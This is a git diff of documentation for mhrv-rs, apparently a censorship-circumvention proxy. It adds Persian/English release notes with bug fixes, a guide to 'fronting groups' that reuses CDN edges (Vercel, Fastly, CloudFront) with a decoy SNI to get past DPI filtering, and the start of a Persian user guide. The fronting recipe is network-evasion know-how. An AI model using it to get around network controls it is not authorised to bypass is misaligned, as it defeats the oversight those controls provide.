+• Tests: 3 new regression tests for `extract_apps_script_user_html` + `decode_js_string_escapes` + `parse_relay_json` end-to-end. **176 lib tests + 33 tunnel-node tests all passing.**
diff --git a/docs/changelog/v1.9.7.md b/docs/changelog/v1.9.7.md
new file mode 100644
index 00000000..54c4a96a
--- /dev/null
+++ b/docs/changelog/v1.9.7.md
@@ -0,0 +1,30 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• چک‌باکس **«Share with other devices on my Wi-Fi / network»** به UI دسکتاپ اضافه شد. به‌جای اینکه کاربر `listen_host` را به‌صورت دستی روی `0.0.0.0` تنظیم کند (که اکثر کاربران نمی‌دانستند)، حالا فقط یک چک‌باکس ساده روی فرم اصلی است. وقتی روشن می‌شود:
+  - Bind به‌طور خودکار به `0.0.0.0` تغییر می‌کند (تمام interfaceها)
+  - IP محلی شبکه‌ات با `detect_lan_ip()` تشخیص داده می‌شود (یک trick UDP `connect` که از kernel می‌پرسد source-IP outbound کدام است — هیچ ترافیک شبکه‌ای واقعی فرستاده نمی‌شود) و در زیر چک‌باکس همراه با پورت‌ها نمایش داده می‌شود تا بتوانی مستقیم به گوشی / لپ‌تاپ مهمان بدهی: `Other devices: HTTP 192.168.x.y:8085 · SOCKS5 192.168.x.y:8086`
+  - tooltip توضیح می‌دهد macOS اولین بار prompt firewall می‌اندازد
+  - اگر کاربر از قبل یک bind IP خاص (مثلاً `192.168.1.50` یک NIC مشخص) در `config.json` نوشته باشد، چک‌باکس قفل می‌شود + برچسب «Custom bind: 192.168.1.50» نشان می‌دهد تا تنظیم دستی توسط Save بعدی پاک نشود.
+  ماژول جدید `src/lan_utils.rs` با ۳ تست (تشخیص wildcard، تشخیص loopback، تست detect واقعی).
+• Code.gs / CodeFull.gs hardening + باگ‌فیکس (هیچ تغییری در کانفیگ کاربر لازم نیست — فقط Code.gs خودتان را با [`assets/apps_script/Code.gs`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/assets/apps_script/Code.gs) (یا `CodeFull.gs` برای حالت full) جایگزین کنید + در Apps Script editor: `Manage deployments → ✏️ → Version: New version → Deploy`. Deployment ID همان قبلی می‌ماند):
+  - **`Code.gs` doGet تکراری حذف شد**: نسخه‌ای که با `HtmlService.createHtmlOutput` تعریف شده بود به‌خاطر hoisting جاوااسکریپت روی نسخهٔ صحیح `ContentService` overwrite می‌کرد. در نتیجه هر GET به URL deployment پاسخ سندباکس `goog.script.init` iframe برمی‌گرداند به‌جای HTML پلیس‌هولدر ساده.
+  - **`CodeFull.gs` `doGet` به `ContentService` تغییر کرد** (قبلاً `HtmlService` بود) — به همان دلیل بالا.
+  - **هدرهای IP-leak در `SKIP_HEADERS` اضافه شد** (`X-Forwarded-For`, `X-Forwarded-Host`, `X-Forwarded-Proto`, `X-Forwarded-Port`, `X-Real-IP`, `Forwarded`, `Via`) — لایهٔ دفاع دوم به stripping سمت کلاینت v1.2.9 (#104).
+  - **`_doBatch` دارای fallback شد**: اگر `UrlFetchApp.fetchAll()` به‌عنوان یک کل throw کند، حالا برای متدهای امن (GET / HEAD / OPTIONS) per-item fetch می‌کند به‌جای صفر کردن کل پاسخ batch. port از `masterking32/MasterHttpRelayVPN@3094288`.
+• `parse_relay_json` (سمت Rust): unwrapper برای `goog.script.init("...userHtml...")` اضافه شد — اگر هر deployment‌ای پاسخ HtmlService-wrapped برگرداند (legacy Code.gs قبل از v1.9.6، یا redirect که doGet را GET بزند)، client حالا JSON داخلی را استخراج می‌کند به‌جای fail کردن با `key must be a string at line 2 column 1`.
+• README بازنویسی شد: نسخهٔ کوتاه دوزبانه (انگلیسی + فارسی RTL) برای کاربر معمولی + راهنمای کامل پیشرفته در [`docs/guide.md`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/docs/guide.md) و [`docs/guide.fa.md`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/docs/guide.fa.md). جدا کردن "راه‌اندازی ۵ دقیقه‌ای" از "همهٔ گزینه‌ها و troubleshooting" راهنما را خیلی قابل‌فهم‌تر کرد. در guide.fa.md task list با `[x]` با جدول جایگزین شد چون رندر RTL در GitHub با چک‌باکس مارک‌داون خراب می‌شد.
+• تست: ۶ regression test جدید (۳ برای unwrap goog.script.init + ۳ برای lan_utils). **۱۷۹ lib test + ۳۳ tunnel-node test همه pass.**
+---
+• Added a **"Share with other devices on my Wi-Fi / network"** checkbox to the desktop UI. Instead of asking users to know they can set `listen_host` to `0.0.0.0` (which almost no one did), it's now a single checkbox on the main form. When enabled:
+  - Bind address auto-flips to `0.0.0.0` (all interfaces)
+  - Your LAN IP is detected via `detect_lan_ip()` (UDP `connect` trick — asks the kernel which source IP it would use for an outbound packet, no actual network traffic sent) and shown alongside the proxy ports so you can hand them to the guest device directly: `Other devices: HTTP 192.168.x.y:8085 · SOCKS5 192.168.x.y:8086`
+  - Tooltip explains macOS will pop a Firewall prompt the first time
+  - If you've already written a specific bind IP (e.g. `192.168.1.50` for one NIC) into `config.json`, the checkbox locks itself and shows a "Custom bind: 192.168.1.50" badge so the next Save can't clobber your manual setting.
+  New `src/lan_utils.rs` module with 3 unit tests (wildcard detection, loopback detection, live detect smoke).
+• Code.gs / CodeFull.gs hardening + bug fixes (no client config change needed — just replace your own Code.gs with [`assets/apps_script/Code.gs`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/assets/apps_script/Code.gs) (or `CodeFull.gs` for full mode) and in the Apps Script editor: `Manage deployments → ✏️ → Version: New version → Deploy`. Your Deployment ID stays the same):
+  - **Removed duplicate `doGet` in `Code.gs`**: a second copy declared with `HtmlService.createHtmlOutput` was silently overriding the correct `ContentService` one due to JS function hoisting. Result: every GET to the deployment URL was returning the `goog.script.init` sandbox iframe instead of the simple placeholder HTML.
+  - **`CodeFull.gs` `doGet` switched to `ContentService`** (was `HtmlService`) — same reason as above.
+  - **Added IP-leak headers to `SKIP_HEADERS`** (`X-Forwarded-For`, `X-Forwarded-Host`, `X-Forwarded-Proto`, `X-Forwarded-Port`, `X-Real-IP`, `Forwarded`, `Via`) — second line of defense to v1.2.9's client-side stripping (#104).
+  - **`_doBatch` got a fallback path**: if `UrlFetchApp.fetchAll()` throws as a whole, it now per-item-fetches safe methods (GET / HEAD / OPTIONS) instead of zeroing the entire batch's responses. Ported from `masterking32/MasterHttpRelayVPN@3094288`.
+• `parse_relay_json` (Rust client): added unwrapper for `goog.script.init("...userHtml...")` iframe — if any deployment ever returns an HtmlService-wrapped response (legacy Code.gs, or a redirect that GET-hits doGet), the client now extracts the inner JSON instead of failing with `key must be a string at line 2 column 1`.
+• Rewrote the README: short bilingual landing page (English + Persian RTL) for normal users, with the full advanced reference moved to [`docs/guide.md`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/docs/guide.md) and [`docs/guide.fa.md`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/docs/guide.fa.md). Splitting "5-minute quick start" from "every option + troubleshooting" makes the docs much more approachable. In guide.fa.md the `[x]` task list was replaced with a table because GitHub's RTL renderer mangled the checkbox positions inside `<div dir="rtl">`.
+• Tests: 6 new regression tests (3 for goog.script.init unwrap + 3 for lan_utils). **179 lib tests + 33 tunnel-node tests all passing.**
diff --git a/docs/changelog/v1.9.8.md b/docs/changelog/v1.9.8.md
new file mode 100644
index 00000000..bbf652aa
--- /dev/null
+++ b/docs/changelog/v1.9.8.md
@@ -0,0 +1,14 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• Fix v1.9.7 Android: کرش روی tap Disconnect ([#666](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/666) از @ilok67 با root cause + fix کامل): `MainActivity.onStop` بعد از `startService(ACTION_STOP)` بلافاصله `stopService()` رو هم می‌زد. ACTION_STOP داخل `MhrvVpnService` یک thread پس‌زمینه به نام `mhrv-teardown` می‌سازه که `teardown()` (بستن tun2proxy، fd TUN، runtime) رو اجرا می‌کنه و در پایانش `stopSelf()` رو فرامی‌خونه. ولی `stopService()` بلافاصله `onDestroy()` رو روی همان service trigger می‌کرد — دو thread همزمان دارن از lifecycle می‌گذرن، و OS process service رو می‌کشه قبل از اینکه teardown تمام بشه. crash بعد از tap Disconnect، در حدود ۹۹٪ از تستها قابل reproduce. حالا `stopService()` حذف شده — `ACTION_STOP` تنها کافی است (هم برای service زنده هم برای حالت زامبی). idempotency guard `tornDown` AtomicBoolean قبلاً موجود بود ولی محافظت OS-level lifecycle race رو نمی‌کرد. تشکر از @ilok67 برای triage عالی.
+• Fix v1.9.7 UI: دکمهٔ Test Relay در حالت `full` (و `direct`) "test result: fail" قرمز نشون می‌داد ([#665](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/665) از @cmptrnb). `mhrv-rs test` فقط برای حالت apps_script سیم‌کشی شده — در `full` mode عمداً refuse می‌کنه چون probe مستقیم Apps Script در حالی که data plane از tunnel-node رد می‌شه گمراه‌کننده است. ولی پیام refuse توسط UI به‌عنوان test failure ترجمه می‌شد + کاربر فکر می‌کرد proxy خراب است. حالا UI mode رو قبل از اجرای test چک می‌کنه + برای حالت‌های نامناسب پیام explainer می‌ده به‌جای fail قرمز:
+> Test Relay is wired only for apps_script mode. In full mode the data plane is the tunnel-node — to verify it end-to-end, start the proxy and load https://whatismyipaddress.com in your browser via 127.0.0.1:8085. The IP shown should be your tunnel-node's VPS IP.
+
+• Tune adaptive batch coalesce (PR [#674](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/674) از @yyoyoian-pixel): از 40 ms → **10 ms** برای client coalesce step و tunnel-node straggler settle step. tunnel-node settle max از 500 ms → **1000 ms**. منطق asymmetric: وقتی هیچ op دیگری نیست، fast-fire (10 ms کافی برای catch کردن op‌هایی که در همان event-loop tick می‌رسن مثل ۶ موازی parallel browser connection)؛ ولی وقتی هر دو طرف data دارن (uploads، page load بستی)، adaptive reset همچنان batch می‌کنه تا 1 s cap. در short: «وقتی چیزی برای انتظار نیست منتظر نباش، وقتی هست با تمام توان batch کن.» سازگار به عقب: کاربران با `coalesce_step_ms: 40` در config.json رفتار قدیمی رو نگه می‌دارن.
+• تست: ۱۷۹ lib + ۳۳ tunnel-node test همه pass.
+---
+• Fix Android crash on tap-Disconnect from v1.9.7 ([#666](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/666) by @ilok67 with full root cause + fix): `MainActivity.onStop` was calling `stopService()` immediately after `startService(ACTION_STOP)`. ACTION_STOP inside `MhrvVpnService` spawns the `mhrv-teardown` background thread that runs `teardown()` (stops tun2proxy, closes TUN fd, shuts down the Rust runtime) and then calls `stopSelf()` at the end. But `stopService()` immediately triggered `onDestroy()` on the same service — two threads racing through the lifecycle, and the OS would kill the process before teardown finished. Crash on every Disconnect tap, ~99% reproducible. Removed the `stopService()` call — `ACTION_STOP` alone is sufficient for both the live-service and the zombie-after-process-death cases. The existing `tornDown` AtomicBoolean idempotency guard protects against double-teardown of native state, but it can't protect against OS-level lifecycle races on stopSelf vs stopService. Thanks @ilok67 for the precise triage.
+• Fix UI showing "test result: fail" red status for `full` (and `direct`) modes from v1.9.7 ([#665](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/665) by @cmptrnb). `mhrv-rs test` is wired only for the apps_script relay path — it deliberately refuses in `full` mode because probing Apps Script directly while the actual data plane goes via tunnel-node would give a misleading green result. But the refuse path was getting translated by the UI as a generic "test failed" with red status, scaring users into thinking their proxy was broken. Now the UI checks mode before running the test and shows a friendly explainer for `full`/`direct`:
+> Test Relay is wired only for apps_script mode. In full mode the data plane is the tunnel-node — to verify it end-to-end, start the proxy and load https://whatismyipaddress.com in your browser via 127.0.0.1:8085. The IP shown should be your tunnel-node's VPS IP.
+
+• Tune adaptive batch coalesce (PR [#674](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/674) from @yyoyoian-pixel): client coalesce step + tunnel-node straggler settle step from 40 ms → **10 ms**, tunnel-node settle max from 500 ms → **1000 ms**. The asymmetric design — small step, generous max — picks up "fire-and-forget when nothing else is queued" without giving up batching on bursts. The 10 ms still catches ops that arrive in the same event-loop tick (e.g. a browser opening 6 parallel connections on page load), so we don't degenerate into single-op batches; but on a download where the client is just waiting for the next chunk, the per-batch dead-air shrinks by ~30 ms. Backwards-compatible: existing configs with explicit `coalesce_step_ms: 40` keep the old behaviour.
+• Tests: 179 lib + 33 tunnel-node tests all passing.
diff --git a/docs/changelog/v1.9.9.md b/docs/changelog/v1.9.9.md
new file mode 100644
index 00000000..b2af4d5b
--- /dev/null
+++ b/docs/changelog/v1.9.9.md
@@ -0,0 +1,22 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• Fix v1.9.8 Android: کرش جدید ~۲ ثانیه بعد از Disconnect ([#700](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/700) از @ilok67 با root cause + fix کامل): علی‌رغم fix v1.9.8 برای race lifecycle (#666)، crash جداگانه در `MhrvVpnService.teardown()` باقی مانده بود. ترتیب قبلی: tun2proxy.stop → tun.close → join → Native.stopProxy. مشکل: tun2proxy worker thread در native code blocked روی socket read از SOCKS5 proxy است. وقتی Tun2proxy.stop کالد می‌شه + 2s timeout می‌گذره + 4s join timeout می‌گذره (worker هنوز alive)، Native.stopProxy runtime Rust رو shutdown می‌کنه شامل listener socket — worker thread که در native blocking read از همان socket است → use-after-free → SIGSEGV. comment کد قدیمی ادعا می‌کرد "runtime shutdown will knock the rest of the world over" که اشتباه بود — Native.stopProxy نمی‌تونه force-terminate یک thread native دیگه. ترتیب جدید: **Native.stopProxy اول** (socket رو می‌بنده → blocking read worker با error برمی‌گرده → worker پاک exit می‌کنه از error path)، بعد Tun2proxy.stop (cooperative، redundant ولی ارزان) → tun.close → join (تقریباً همیشه فوری چون worker از قبل تموم شده). تشکر بیشتر از @ilok67 برای triage دقیق دومین crash.
+• Fix tunnel-node batch drain correctness + lock contention (PR [#695](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/695) از @dazzling-no-more): چهار باگ، دو correctness، دو latency.
+  - **Cleanup race tail-bytes drop می‌کرد:** session با buffer > ۱۶ MiB + EOF — `drain_now` صحیح `eof=false` برمی‌گردوند تا tail رو در poll بعدی drain کنه، ولی cleanup loop همان atomic رو می‌خوند، `true` می‌دید + session رو حذف می‌کرد + `reader_task` رو abort + tail هدر می‌رفت. حالا cleanup از مقدار return `drain_now` پیروی می‌کنه — session فقط بعد از shipped شدن drain که `eof=true` می‌فرسته، حذف می‌شه. data loss silent در 1Gbps+ VPS که buffer بین poll‌ها پر می‌شد، fix شد.
+  - **Sessions-map lock روی upstream await نگه می‌داشت:** phase-1 `data` op global sessions map رو نگه می‌داشت روی `last_active.lock`، `writer.lock`، `write_all`، و `flush` — head-of-line-block برای هر batch + connect/close op دیگه. حالا (مثل `udp_data` که قبلاً درست بود) Arc از under map clone می‌شه، lock drop، بعد write/flush.
+  - **TCP+UDP batch deadline UDP رو می‌پرداخت:** `tokio::join!(wait_tcp, wait_udp)` conjunctive هست — TCP-ready burst هنوز LONGPOLL_DEADLINE 15 ثانیه‌ای UDP رو می‌پرداخت قبل از پاسخ. comment می‌گفت "either side"، code "both sides" انجام می‌داد. تغییر به `select!`. test جدید `batch_tcp_ready_does_not_pay_udp_longpoll_deadline` این رد رو حفظ می‌کنه.
+  - **Watcher tasks تحت `select!` cancellation leak می‌کرد:** `wait_for_any_drainable` فقط در trailing loop watcher‌ها رو abort می‌کرد — past همه cancel point‌ها. با تبدیل phase-2 wait به `select!`، loser arm's future drop می‌شه و watcher‌هاش *detach* می‌شن (drop کردن `JoinHandle` abort نمی‌کنه). هر orphan یک `Arc<...Inner>` نگه می‌داشت + می‌توانست `notify_one()` permit از batch بعدی بدزده. fix: `AbortOnDrop` newtype روی همه `JoinHandle` watcher.
+  ۲ test جدید + 35/35 pass.
+• Example config exit-node با `aistudio.google.com` و `ai.google.dev` — درخواست از [#701](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/701). AI Studio روی Iran IP sanction می‌خوره (نه Apps Script طرف ما). مقصد IP exit node رو می‌بینه که نه Iran است نه Google datacenter.
+• Example config fronting-groups با Reddit / Fastly / Pinterest / CNN / BuzzFeed family domains اضافه شد (PR [#696](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/696) از @Shjpr9). همه روی Fastly Anycast 151.101.x.x — کاربران می‌تونن از example بیشتر دامنه برداشت کنن، اونی که در شبکه‌شان کار می‌کنه نگه دارن.
+• تست: ۱۷۹ lib + ۳۵ tunnel-node test همه pass.
+---
+• Fix Android `~2-second-delayed` crash on Disconnect from v1.9.8 ([#700](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/700) by @ilok67 with full root cause + fix): despite the v1.9.8 fix for the lifecycle race (#666), a separate crash inside `MhrvVpnService.teardown()` remained. Old order was tun2proxy.stop → tun.close → join → Native.stopProxy. Problem: tun2proxy's worker thread is blocked in native code on a socket read from the proxy's SOCKS5 port. After `Tun2proxy.stop()`'s 2s timeout and the 4s thread join both expire (worker still alive), `Native.stopProxy()` shuts down the Rust runtime — including the listener socket — and the worker, still reading from that socket in native code, hits use-after-free → SIGSEGV. The old code comment claimed "the runtime shutdown will knock the rest of the world over," which was wrong: `Native.stopProxy` cannot forcibly terminate a separate native thread. New order: **`Native.stopProxy` FIRST** (closes the socket → worker's blocking read returns with EOF/error → worker exits cleanly through its error path), then `Tun2proxy.stop` (cooperative, mostly redundant but cheap), `tun.close`, then `join` (almost always immediate now). Thanks @ilok67 again for the precise root-cause work on the second crash.
+• Fix tunnel-node batch drain correctness + lock contention (PR [#695](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/695) from @dazzling-no-more): four bugs, two correctness + two latency.
+  - **Cleanup race dropped tail bytes:** when a session's read buffer > 16 MiB and upstream signaled EOF, `drain_now` correctly returned `eof=false` and left the tail for the next poll, but the cleanup loop read the raw atomic, saw `true`, removed the session, aborted `reader_task`, dropped the tail. Cleanup now tracks eof'd sids from `drain_now`'s return value — the session is only removed once the drain that returned `eof=true` has shipped to the client. Silent data loss on 1Gbps+ VPS that filled the buffer between polls — fixed.
+  - **Sessions-map lock held across upstream awaits:** phase-1 `data` op held the global sessions map across `last_active.lock`, `writer.lock`, `write_all`, and `flush` — head-of-line-blocking every other batch and connect/close op. Now (mirroring `udp_data`'s already-correct shape) it clones the `Arc` under the map lock, drops the lock, then awaits.
+  - **Mixed TCP+UDP batch paid the slower side's deadline:** `tokio::join!(wait_tcp, wait_udp)` is conjunctive — a TCP-ready burst still paid the UDP `LONGPOLL_DEADLINE` (15 s) before responding. Comment said "either side", code did "both sides". Switched to `tokio::select!`. New test `batch_tcp_ready_does_not_pay_udp_longpoll_deadline` locks down the regression.
+  - **Watcher tasks leaked under `select!` cancellation:** `wait_for_any_drainable` only aborted its watcher tasks in a trailing loop, past every cancellation point. With phase-2 wait flipped to `select!`, the loser arm's future drops and *detaches* its watchers (dropping a `JoinHandle` doesn't abort). Each orphan held an `Arc<...Inner>` and could steal a `notify_one()` permit from a future batch. Fix: `AbortOnDrop` newtype wraps every watcher `JoinHandle`.
+  2 new tests + 35/35 pass.
+• Example config exit-node now lists `aistudio.google.com` and `ai.google.dev` — requested in [#701](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/701). AI Studio sanctions Iran IPs (independently of any Apps Script issue on our side). Routing it through the exit-node makes the destination see the exit node's IP, which is neither Iran nor a Google datacenter.
+• Example config fronting-groups gained Reddit / Fastly / Pinterest / CNN / BuzzFeed family domains (PR [#696](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/696) from @Shjpr9). All on the Fastly Anycast `151.101.x.x` edge — gives users a richer starter list to trim down based on what works in their network.
+• Tests: 179 lib + 35 tunnel-node tests all passing.
diff --git a/docs/fronting-groups.md b/docs/fronting-groups.md
new file mode 100644
index 00000000..ac57c230
--- /dev/null
+++ b/docs/fronting-groups.md
@@ -0,0 +1,143 @@
+# Multi-edge fronting groups
+
+The default mhrv-rs SNI-rewrite path targets Google's edge: TLS goes out
+with `SNI=www.google.com` to a Google IP, the inner `Host` header (after
+the local MITM CA terminates the browser's TLS) names the real
+destination, and Google's frontend routes by `Host`. That's how
+`www.youtube.com`, `script.google.com`, and friends reach you despite a
+DPI box that drops anything not SNI'd as `www.google.com`.
+
+The same trick works on any multi-tenant CDN edge that:
+
+1. serves multiple tenant domains on the same IP pool, and
+2. dispatches to the right backend by inner HTTP `Host`, and
+3. presents a TLS cert whose name matches the SNI you choose.
+
+Vercel, Fastly, and AWS CloudFront (which is what Netlify-hosted sites
+sit behind) all fit the bill. Pick a benign-looking domain hosted on
+the same edge, use it as the SNI, and you can route many other domains
+on that edge through the same tunnel without burning Apps Script quota.
+
+## Config shape
+
+```jsonc
+{
+  "mode": "direct",                         // or apps_script / full
+  "fronting_groups": [
+    {
+      "name":    "vercel",                  // free-form, used in logs
+      "ip":      "76.76.21.21",             // a Vercel edge IP
+      "sni":     "react.dev",               // a Vercel-hosted domain
+      "domains": [                          // hosts to route via this group
+        "vercel.com", "vercel.app",
+        "nextjs.org", "now.sh"
+      ]
+    }
+  ]
+}
+```
+
+`domains` matches case-insensitively, exact OR dot-anchored suffix —
+`vercel.com` covers both `vercel.com` and `*.vercel.com`. First group
+in the list whose member matches wins.
+
+A working example is shipped at `config.fronting-groups.example.json`.
+
+## Picking the (ip, sni) pair
+
+The SNI must be a real, currently-live domain on the same edge. rustls
+validates the upstream cert against the SNI you send; if the edge
+returns a cert that doesn't cover that name, the handshake fails. So
+the recipe is:
+
+1. Pick the target edge (Vercel, Fastly, …).
+2. Find a neutral, never-blocked domain hosted there. Vercel: `react.dev`,
+   `nextjs.org`. Fastly: `www.python.org`, `pypi.org`. AWS CloudFront
+   (where Netlify lives): `letsencrypt.org`, `aws.amazon.com`.
+3. Resolve that domain (`dig +short react.dev A`) — pick one IP, drop
+   it in `ip`.
+4. List the domains you actually want to reach via this edge in
+   `domains` — **only domains you've verified are hosted on the same
+   edge as `sni`** (see warning below).
+
+Edge IPs rotate. If a group's `ip` stops working, re-resolve the SNI
+domain and update the config — IP rotation per-group is on the
+roadmap but not implemented yet.
+
+## ⚠️ Cross-tenant leak: don't list domains that aren't on the edge
+
+If you put a domain in `domains` that is **not** actually hosted on the
+edge you've configured, two things happen, both bad:
+
+1. **Privacy leak.** The proxy completes a TLS handshake with the edge
+   (validated against `sni`, which IS on the edge), then sends `Host:
+   <your-domain>` inside that encrypted stream. The edge — which is
+   not your-domain's host — now sees a request labelled with
+   your-domain's name. From the edge's perspective, *you* deliberately
+   sent that request to them. Vercel/Fastly logs will show your-domain
+   in their access logs, attributable to your IP and timestamps.
+
+2. **UX failure.** The edge has no backend for your-domain, so it
+   returns its default 404 / wrong-tenant page. The site appears
+   "broken via mhrv-rs" but works fine over a normal connection,
+   which is confusing to debug.
+
+**Verify before listing.** A simple check: if `dig +short your-domain
+A` returns an IP that's *also* one of the edge's IPs, you're fine. If
+the IPs differ, your-domain is hosted somewhere else and listing it
+will leak. This is also why the upstream MITM-DomainFronting Xray
+config uses `verifyPeerCertByName` with an explicit SAN allowlist —
+it's a second guard against accidentally fronting unrelated domains
+through the same edge. mhrv-rs leaves verification to rustls + the
+SNI you send; the leak guard is "you, the operator, listing only
+domains you've verified."
+
+Only listed domains are routed to the group. Anything else falls
+through to the next dispatch step (Google SNI-rewrite or Apps Script
+relay), so unrelated traffic does NOT accidentally hit a group's edge.
+
+## Routing precedence
+
+Within a single CONNECT, the dispatch order is:
+
+1. `passthrough_hosts` — explicit user opt-out.
+2. DoH bypass (port 443, known DoH host).
+3. `mode = full` — everything via the batch tunnel mux.
+4. **`fronting_groups` match (port 443).** — this feature.
+5. Built-in Google SNI-rewrite suffix list (port 443).
+6. `mode = direct` fallback → raw TCP.
+7. `mode = apps_script` peek + relay.
+
+So fronting groups beat the Google-edge default for hosts they list,
+but lose to user-explicit passthrough/DoH choices. Putting `vercel.com`
+in a Vercel fronting group will route Vercel traffic through Vercel's
+edge directly, not through the Apps Script relay or the Google edge.
+
+## Limitations / what's not here yet
+
+- **Single IP per group.** Real edges have many; we'll add a pool with
+  health-checking when there's a clear need. Workaround: when the
+  configured IP starts failing, swap it.
+- **No bundled domain catalog.** The upstream Xray config uses
+  `geosite:vercel` / `geosite:fastly` lists from a binary geosite
+  database — we don't ship that, you list domains explicitly.
+- **No UI editor.** Edit `config.json` directly. The UI's Save path
+  preserves your `fronting_groups` block (round-tripped) — it just
+  doesn't render an editor for it.
+- **Browsers only for Android non-root**, same as the Google path —
+  third-party apps that don't trust user CAs (Telegram, Instagram, …)
+  can't be MITM'd, so this trick doesn't help them.
+- **Cert verification matches the SNI.** No per-group SAN allowlist
+  (their `verifyPeerCertByName`); the SNI you send IS what rustls
+  validates against. If you want stricter pinning, setting
+  `verify_ssl: false` is the wrong answer — instead, pick an SNI whose cert
+  genuinely covers your targets.
+
+## Credit
+
+The technique is the same one [@masterking32](https://github.com/masterking32)'s original
+MasterHttpRelayVPN demonstrated for Google's edge. The Vercel +
+Fastly extension and the matching Xray config came from
+[@patterniha](https://github.com/patterniha)'s [MITM-DomainFronting](https://github.com/patterniha/MITM-DomainFronting)
+project — this `fronting_groups` field is a Rust port of that idea
+into mhrv-rs's existing dispatcher.
diff --git a/docs/guide.fa.md b/docs/guide.fa.md
new file mode 100644
index 00000000..3e95ffc5
--- /dev/null
+++ b/docs/guide.fa.md
@@ -0,0 +1,447 @@
+<div dir="rtl">
+
+# mhrv-rs — راهنمای کامل
+
+این نسخهٔ کامل و فنی است — همهٔ گزینه‌های کانفیگ، همهٔ حالت‌های پیشرفته، همهٔ راه‌های رفع اشکال. برای راه‌اندازی ۵ دقیقه‌ای، [README اصلی](../README.md) را ببین.
+
+[English version](guide.md)
+
+## فهرست
+
+- [نگاه دقیق به نحوهٔ کارکرد](#نگاه-دقیق-به-نحوهٔ-کارکرد)
+- [پلتفرم‌ها و فایل‌های اجرایی](#پلتفرم‌ها-و-فایل‌های-اجرایی)
+- [محل ذخیرهٔ فایل‌ها](#محل-ذخیرهٔ-فایل‌ها)
+- [دیپلوی Apps Script](#دیپلوی-apps-script)
+  - [نسخهٔ Cloudflare Worker (سریع‌تر)](#نسخهٔ-cloudflare-worker)
+  - [حالت direct (وقتی ISP خود `script.google.com` را بسته)](#حالت-direct)
+- [مرجع CLI](#مرجع-cli)
+  - [حالت scan-ips با API](#حالت-scan-ips-با-api)
+- [تلگرام با xray](#تلگرام-با-xray)
+- [حالت تونل کامل](#حالت-تونل-کامل)
+  - [تأثیر تعداد Deployment](#تأثیر-تعداد-deployment)
+  - [راه‌اندازی سریع](#راه‌اندازی-سریع-حالت-full)
+- [Exit node — برای ChatGPT / Claude / Grok](#exit-node)
+- [اشتراک‌گذاری از طریق هات‌اسپات](#اشتراک‌گذاری-هات‌اسپات)
+- [اجرا روی OpenWRT](#اجرا-روی-openwrt)
+- [ابزارهای تشخیص](#ابزارهای-تشخیص)
+  - [ویرایشگر SNI pool](#ویرایشگر-sni-pool)
+- [چه چیز پیاده شده و چه چیز نه](#چه-چیز-پیاده-شده-و-چه-چیز-نه)
+- [محدودیت‌های شناخته‌شده](#محدودیت‌های-شناخته‌شده)
+- [امنیت](#امنیت)
+- [سؤالات رایج](#سؤالات-رایج)
+
+## نگاه دقیق به نحوهٔ کارکرد
+
+```
+مرورگر / تلگرام / xray
+        |
+        | HTTP proxy (8085)  یا  SOCKS5 (8086)
+        v
+mhrv-rs (محلی)
+        |
+        | TLS به IP گوگل، SNI = www.google.com
+        v                       ^
+   DPI می‌بیند: www.google.com   |
+        |                       | Host: script.google.com (داخل TLS)
+        v                       |
+  لبهٔ گوگل ----------------------+
+        |
+        v
+  رلهٔ Apps Script (حساب رایگان شما)
+        |
+        v
+  مقصد واقعی
+```
+
+DPI سانسورگر فقط SNI داخل TLS را می‌بیند و اجازه می‌دهد `www.google.com` رد شود. لبهٔ گوگل هم `www.google.com` و هم `script.google.com` را روی یک IP سرو می‌کند و بر اساس هدر HTTP `Host` داخل تونل رمزشده آن‌ها را تفکیک می‌کند.
+
+برای دامنه‌های متعلق به گوگل (`google.com`, `youtube.com`, `fonts.googleapis.com`, …) همان تونل مستقیم استفاده می‌شود — بدون رلهٔ Apps Script. این کار سهمیهٔ هر-fetch را دور می‌زند و مشکل قفل‌بودنِ User-Agent روی `Google-Apps-Script` را برای آن سایت‌ها برطرف می‌کند. برای اضافه کردن دامنه‌های دیگر از فیلد `hosts` در `config.json` استفاده کن.
+
+## پلتفرم‌ها و فایل‌های اجرایی
+
+لینوکس (x86_64، aarch64)، مک (x86_64، aarch64)، ویندوز (x86_64)، **اندروید ۷.۰ به بالا** (APK جهانی شامل arm64، armv7، x86_64، x86). فایل‌های آماده در [صفحهٔ releases](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases).
+
+**اندروید:** فایل `mhrv-rs-android-universal-v*.apk` را دانلود کن. راهنمای کامل در [docs/android.fa.md](android.fa.md) (فارسی) یا [docs/android.md](android.md) (انگلیسی). نسخهٔ اندروید همان `mhrv-rs` Rust دسکتاپ را اجرا می‌کند (از طریق JNI) به‌علاوهٔ پل TUN با `tun2proxy` تا تمام برنامه‌های دستگاه بدون نیاز به تنظیم per-app از پروکسی رد شوند.
+
